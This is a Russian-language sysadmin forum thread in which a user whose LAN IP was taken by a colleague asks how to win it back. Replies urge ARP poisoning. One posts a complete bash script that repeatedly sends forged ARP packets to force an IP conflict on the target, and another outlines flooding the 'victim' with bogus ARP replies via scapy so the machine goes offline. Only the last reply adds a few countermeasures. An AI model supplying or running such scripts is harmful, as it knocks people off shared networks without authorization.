LINUX.ORG.RU
ФорумAdmin

Есть локалка и в ней заняли ip


0

0

собстно сабж, нужно все остальные машины убедить что ип никто не занимал, да помню есть такая атака (отправка всем arp пакета указывающего что данным ип соотв. моему mac-адресу), но тут косяк в том что админ идиот и хозяин той машины что заняла ип имеет с админом что-то общее, надо выкручиваться.

нужна утилита которая будет при наличии в сети конфликта ip восстанавливать справедливость, помню еще можно с эмитировать выключенную сеть, тогда умник догадается занять другой ип и освободит мой.

ps. Да, найти и дать по башке хорошо, но найти его нереально.

★★☆

битва за красивые ип?
дождись когда он выключится...поставь себе его ип как альтернативный
сеть у тебя работать будет
а у него не факт =)
потом когда его достанет сообщение о совпадении ИП`шки то он сам поменяет её себе =)

kam ★★
()
Ответ на: комментарий от kam

>сеть у тебя работать будет

Не факт, иногда бывает так, что сеть работает у того кто позже включил.

KKV
()
Ответ на: комментарий от kam

НИфига два года стоял на роутере алиас на этот ип, а дето месяц назад кактой идиот его занял, но сеть то работает, на основном ип правда.

wfrr ★★☆
() автор топика

гадь ARP-пакетами о том что этот ип у твоего МАК

anonymous
()
Ответ на: комментарий от z0D5e8n7x

Да тут ничего интересного, щас роутер апгрейдится, потом arp-sk, а там уже погляжу что он умеет, по идее отравить кеш злодею чтоб он никого не видел и остальным отправить нужный ип.

wfrr ★★☆
() автор топика
Ответ на: комментарий от Komintern

Скрипт. ip_conflict

#!/bin/bash
MY_MAC="00:C0:DF:08:11:CC"
IPs=""
# First check parameters
while [ "$1" != "" ]; do
IPs=$IPs" "$1
shift
done
			   
# If no parameter was passed, listen on STDIN
if [ -z "$IPs" ];
then
while read in; do
IPs=$IPs" "$in
done
fi

while : 
do 
echo SLEEP 3 SEC!
sleep 3

				       
for TARGET_IP in $IPs
do
 # First get the MAC address of the IP owner
TARGET_MAC="`arping -fc 1 $TARGET_IP | grep "Unicast" | cut -d "[" -f 2 | cut -d "]" -f 1`"
if [ -z "$TARGET_MAC" ];
then
# An older version of arping doesn't work the same way
TARGET_MAC="`arping -c 1 $TARGET_IP | grep "from" | cut -d " " -f 4`"
fi
								     
if [ -z "$TARGET_MAC" ];
then
echo "The IP $TARGET_IP is not online!"
continue
fi
								       
# Then send only to this host an ARP-package that his IP now
# also registered on my host
send_arp $TARGET_IP $MY_MAC $TARGET_IP $TARGET_MAC
echo "Sent IP conflict message to IP $TARGET_IP"
done


done


запускать ip_conflict XXX.XXX.XXX.XXX

anonymous
()
Ответ на: комментарий от wfrr

Спасибо, что предупредил.

Слышь, а нахрена тебе сдался мой ip? В нашей сетке ты меня уже достал.

Будешь рыпаться дальше — пиняй на себя...

anonymous
()

Если сеть на простых свичах, то:

1)Проверяешь арп-запросом поставил ли противник себе "недозволенный" айпи.
2)Если 1 - да, то закидываешь жертву некорректными арп-ответами(а ещё лучше арп-запросами) о том что (допустим) все айпи адреса твоей сети имеют совсем другие, левые мак-адреса.
3)Если 1 - нет то ничего не делаешь. жертва "одумалась"

Всё херачишь в цикл.
Результат: жертва испытывает эффект оффлайна)
Написать можно вышесказанное например на питоне+scapy(библиотека для удобной генерации, приёма и обработки сетевых пакетов). Довольно просто пишется.

Контрмеры: такой траффик заблокировать тяжело. Придётся составлять корректную таблицу соответствия мак-айпи (/etc/ethers) и отрубать арп на сетевухе (ifconfig ethX -arp)
Также придётся периодически сообщять тем, с кем ты хочешь общаться, свои мак-айпи посредством вручную сгенерированных арп-запросов(или ответов)
Можно ещё похимичить с arptables, но точно не знаю как. (не юзал)

Nao ★★★★★
()
Вы не можете добавлять комментарии в эту тему. Тема перемещена в архив.